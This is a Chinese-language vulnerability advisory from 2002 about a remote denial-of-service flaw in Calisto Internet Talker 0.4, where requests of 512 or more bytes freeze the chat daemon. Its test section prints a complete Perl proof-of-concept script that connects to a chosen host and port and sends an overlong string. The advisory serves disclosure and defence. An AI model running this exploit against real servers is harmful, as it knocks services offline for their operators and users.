Calisto Internet Talker远程拒绝服务攻击漏洞
发布日期:2002-11-25
更新日期:2002-12-02
受影响系统:Calisto Calisto Internet Talker 0.4
描述:
BUGTRAQ ID:
6238
Calisto是一款允许多人使用telnet连接服务器进行聊天的程序。
Calisto对带有超长数据的请求处理不正确,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
发送512字节或者更多数据请求给Calisto守护程序,可使系统停止运行,产生拒绝服务。需要手工重新启动获得正常服务。
<*来源:subversive (
subversive@linuxmail.org)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103825681701538&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
subversive(
subversive@linuxmail.org) 提供了如下测试程序:
#!/usr/bin/perl
#
# S e c u r i t y F r e a k s
# www.securityfreaks.com
#
# Calisto Internet Talker Version 0.04 Remote Denial of Service
#
#
# This exploit will not cause Calisto to crash but rather cause it
# to freeze until manually restarted. This actually works out better
# because Calisto comes with an autorun script that would restart it
# should it crash anyway.
#
# [ subversive[at]linuxmail.org ] - *31/10/2002*
use IO::Socket;
$data = "A";
$size = "512";
$freeze .= $data x $size;
while($_ = $ARGV[0], /^-/) {
shift;
last if /^--$/;
/^-h/ && do { $host = shift; };
/^-p/ && do { $port = shift; };
}
if(!$host != 0) {
print <<"ACTIONSSPEAKLOUDERTHANWORDS";
S e c u r i t y F r e a k s
www.securityfreaks.com
SF-talkischeap.pl by subversive
Calisto Internet Talker Version 0.04 Remote Denial of Service
Usage : $0 -h <host> -p <port>
ACTIONSSPEAKLOUDERTHANWORDS
exit;
}
my $sock = new IO::Socket::INET ( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
);
die "\nCould not connect to $host : $!\n" unless $sock;
print $sock "$freeze";
close($sock);
exit;
建议:
厂商补丁:
Calisto
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.arcsite.de/hp/flibble/calisto/浏览次数:2664
严重程度:0(网友投票)